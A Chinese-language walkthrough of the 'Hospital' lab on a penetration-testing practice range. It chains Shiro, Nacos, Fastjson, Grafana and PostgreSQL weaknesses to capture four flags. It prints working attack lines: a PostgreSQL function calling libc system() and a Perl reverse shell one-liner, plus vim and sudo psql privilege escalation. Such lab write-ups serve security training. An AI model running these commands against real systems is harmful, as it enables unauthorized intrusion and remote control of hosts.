春秋云镜-Hospital

admin 2025年3月25日20:16:37评论11 views字数 1371阅读4分34秒阅读模式
春秋云镜-Hospital

flag1

给了一个 IP ,先做个全端口探测

春秋云镜-Hospital

shiro 特征,且存在 heapdump 泄露,已经能猜出来是从内存文件中拿到 shiro key 打 shiro

春秋云镜-Hospital

拿到 key 为 GAYysgMQhG7/CzIJlVpR2g==,用 shiro 工具 rce

春秋云镜-Hospital

上线后,因为不是 root 权限,读取不了 flag,SUID 看看

春秋云镜-Hospital

有一个 vim ,那就用 vim 读取拿到第一个 flag

vim /root/flag/flag01.txt
春秋云镜-Hospital

flag2

入口点机器为 172.30.12.5,做代理,对内网继续探测

春秋云镜-Hospital

拿到两个内网地址

http://172.30.12.6:8848   nacos漏洞
http://172.30.12.236:8080  web服务-医院后台管理

先看 nacos ,默认密码 nacos/nacos 登录

春秋云镜-Hospital

配置文件拿到数据库账号密码,只能本地连接,暂时用不上

url: 172.30.12.6:3306
username: root
password: P@ssWord!!!

在对 nacos 做一次漏洞扫描,存在 Nacos Derby SQL,尝试 rce

春秋云镜-Hospital

注入内存马

春秋云镜-Hospital

拿到第二个 flag

春秋云镜-Hospital

flag3

上面信息收集都做完了,没有什么实质性可利用内容,只能看 http://172.30.12.236:8080 的 web 服务

通过报错发现存在 fastjson 组件春秋云镜-Hospital

注入内存马春秋云镜-Hospital

root 权限,直接拿flag春秋云镜-Hospital

flag4

因为该机器不出网,配置入口点机器开隧道上线,存在新的网段 172.30.54.179/24

春秋云镜-Hospital

fscan 探测该网段信息春秋云镜-Hospital

收集到一个 Grafana 服务,没有设置密码,且存在任意文件读取漏洞春秋云镜-Hospital

春秋云镜-Hospital

通过 https://github.com/A-D-Team/grafanaExp 项目解密 grafana.db

拿到数据库账号密码 postgres:Postgres@123

春秋云镜-Hospital

postgresql 8.1 版本,不验证 magic block,直接调用 libc.so 即可

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6''system' LANGUAGE 'c' STRICT;

select system('perl -e 'use Socket;$i="172.30.54.179";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'');

反弹 shell 到同一网段中的 172.30.54.179 机器上

春秋云镜-Hospital

权限不足,仍然要想办法提权读取 root 目录下的 flag 文件春秋云镜-Hospital

先把反弹 shell 进入交互 shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

SUID 没有可利用内容春秋云镜-Hospital

再看看 sudo -l春秋云镜-Hospital

存在 psql 可以利用春秋云镜-Hospital

在数据库中修改 root 密码为 123456

ALTER USER root WITH PASSWORD '123456';
春秋云镜-Hospital

读取 flag

春秋云镜-Hospital

原文始发于微信公众号(虹猫少侠):春秋云镜-Hospital

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月25日20:16:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   春秋云镜-Hospitalhttps://cn-sec.com/archives/3881948.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息